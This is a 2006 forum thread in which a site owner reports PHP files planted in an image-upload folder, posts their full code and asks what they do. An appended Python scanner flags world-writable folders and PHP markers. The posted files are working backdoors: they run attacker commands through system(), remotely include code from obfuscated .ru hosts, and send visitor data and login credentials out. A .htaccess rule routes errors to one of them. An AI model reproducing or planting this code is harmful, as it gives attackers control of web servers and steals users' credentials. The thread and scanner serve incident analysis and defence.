pbjorge12 Posted July 1, 2006

Hey... I'm a little worried about this odd problem that has begun to show up. Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...

The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}
else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)){
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]
<?
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}
?>
[/code]

.htaccess
[code]
Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file names with different content were in each folder...

Note2: The files were created by "nobody", the default apache user...

Is this normal? What is it? What is its purpose?

redarrow Posted July 1, 2006

I don't know, but I also got a .php file put in my folder one day and it outputted all my code within that folder. Scary?

pbjorge12 Posted July 1, 2006

It's VERY scary... If I don't get this figured out I'm gonna be up ALL night!

redarrow Posted July 1, 2006

Take away the [][] brackets to see the code larger, OK.

redarrow Posted July 1, 2006

If you find that you haven't done any validation on users uploading the correct file extension, then post the relevant upload code. If you have done that, read on!

OK, you made me paranoid. Now what I did 5 min ago is check phpMyAdmin for any databases that I didn't know of being mine; you should take these steps. I had no extra ones, thank god.

Now, what I understand is that if a hacker got your MySQL details then they can use your database for their own needs, and in some cases also use a folder you didn't know about, but the best practice is to check the database entries, and if they're all yours, lol... you're OK, you can sleep tonight.

But in the worst situation, where a person has leeched onto your database, then you have to reset the passwords on all your scripts and database, OK, and then delete any unknown folders and files. I would suggest a fresh copy of everything, OK. Scary. Good luck.

pbjorge12 Posted July 1, 2006

Well... After doing some research, this is an exploit that works with directories with 777 permissions (which mine is). I am still looking for a fix...

redarrow Posted July 1, 2006

Explain more, what do you mean, an exploit? What, they get in 777 folders, how? lol, you make me more worried.
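
A scan for the situation described in this thread, as an added example that is not part of any post: it walks an upload tree and reports world-writable (777) directories, script or .htaccess file names, files whose content is not an image, and files containing PHP markers. The function names, the marker list and the sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")  # JPEG, PNG, GIF
SCRIPT_NAMES = (".htaccess", ".php", ".phtml", ".php5", ".phar")  # assumed deny-list of suffixes
PHP_MARKERS = (b"<?php", b"base64_decode(", b"include_once(", b"system(")  # seen in the quoted files

def scan_upload_tree(root):
    """Return {relative_path: [reasons]} for everything that does not belong in an image store."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # World-writable: any local account, including the web server user, can create files here.
        if stat.S_IMODE(os.stat(dirpath).st_mode) & stat.S_IWOTH:
            findings[rel_dir] = ["world-writable directory"]
        for name in files:
            with open(os.path.join(dirpath, name), "rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB covers the header and marker checks
            reasons = []
            if name.lower().endswith(SCRIPT_NAMES):
                reasons.append("script or server-config file name")
            if not data.startswith(IMAGE_MAGIC):
                reasons.append("content is not JPEG/PNG/GIF")
            if any(marker in data for marker in PHP_MARKERS):
                reasons.append("PHP code marker in content")
            if reasons:
                findings[os.path.normpath(os.path.join(rel_dir, name))] = reasons
    return findings

def build_constructed_sample(root):
    """Constructed sample tree (not the poster's real files): one image, three intruders."""
    full = os.path.join(root, "full")
    os.mkdir(full)
    os.chmod(full, 0o777)
    samples = {
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "base.php": b"<?php error_reporting(0); ?>",
        ".htaccess": b"Options -MultiViews\n",
        "create.jpg": b"<? include_once('placeholder'); ?>",  # image name, script content
    }
    for name, body in samples.items():
        with open(os.path.join(full, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        print(*sorted(scan_upload_tree(tmp).items()), sep="\n")
```

Run against the real upload root from cron or after an incident; anything it reports should be compared with the files the application itself is supposed to write.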